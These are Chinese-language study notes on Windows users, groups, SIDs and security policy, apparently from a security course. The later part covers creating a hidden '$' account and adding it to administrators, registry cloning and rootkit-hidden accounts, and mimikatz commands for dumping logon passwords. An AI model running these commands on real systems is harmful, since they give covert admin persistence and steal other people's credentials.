每个用户身份权限不同；每个用户都有一个账号密码；唯一安全标识符。

• 查看本地用户和组
  计算机右键->管理->本地用户和组 命令模式net user
  

• 查用户信息 SID等
  whoami /user 对应注册表的这里
  

用户管理

• 在服务器管理器中管理用户

• 本地安全策略 打开运行 secpol.msc 本地策略->用户权限分配

内置用户账户

Administrator管理员用户 guset来宾用户
与使用计算机的人无关：system本地系统 local service本地服务与users权限一致较低，一旦这些服务被入侵，也没有访问系统重要位置的权限 network service网络服务
计算机右键->管理->服务
任务管理器

组账户

权限分配一个个太麻烦了，把用户都分配到组里面批量操作。

• 需人为添加成员的内置组
  administrator guests Power Users Users（标准用户）

• 动态包含成员的内置组
  成员由windows程序自动添加，动态变化 everyone 包含任何用户

• 添加用户

有这个符号的就是加隐藏用户
net user test$ /add

• 添加用户组
  net localgroup administrators test$ /add

• 通过注册表克隆用户

• 通过rootkit工具超级隐藏账户（注册表也找不到）

windows密码破解

windows的密码破不破解都无所谓。

• mimikatz本地获取密码

    privilege::debug    /提权
    sekurlsa::logonpasswords    /抓取密码

• PE工具
  SAM文件：保存windows密码的，需要使用工具操作它。